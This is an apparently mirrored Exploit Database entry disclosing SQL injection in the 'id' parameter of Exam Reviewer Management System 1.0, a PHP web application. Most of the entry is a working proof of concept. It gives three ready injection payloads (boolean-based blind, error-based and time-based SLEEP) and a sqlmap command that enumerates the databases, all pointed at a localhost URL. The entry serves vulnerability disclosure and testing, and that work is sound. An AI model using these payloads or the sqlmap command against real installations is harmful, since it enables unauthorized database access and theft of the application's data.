Exam Reviewer Management System 1.0 – ‘id’ SQL Injection

• Exploit Database
• 18 阅读

• 作者： Juli Agarwal
  日期： 2022-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50725/

• # Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
  # Date: 2022-02-18
  # Exploit Author:Juli Agarwal(@agarwaljuli)
  # Vendor Homepage:
  https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
  
  # Software Link:
  https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
  
  # Version: 1.0
  # Tested on: Windows 10/Kali Linux
  
  
  
  Description – The ‘id’ parameter in Exam Reviewer Management System web
  application is vulnerable to SQL Injection
  
  Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
  
  
  
  POC:-
  
  
  
  ---
  
  Parameter: id (GET)
  
  Type: boolean-based blind
  
  Title: AND boolean-based blind - WHERE or HAVING clause
  
  Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
  
  
  
  Type: error-based
  
  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
  clause (FLOOR)
  
  Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
  COUNT(*),CONCAT(0x71766a7071,(SELECT
  (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
  
  
  
  Type: time-based blind
  
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  
  Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
  AND 'vqGg'='vqGg---
  
  
  
  *SQLMAP COMMAND*
  
  
  
  *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
  <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*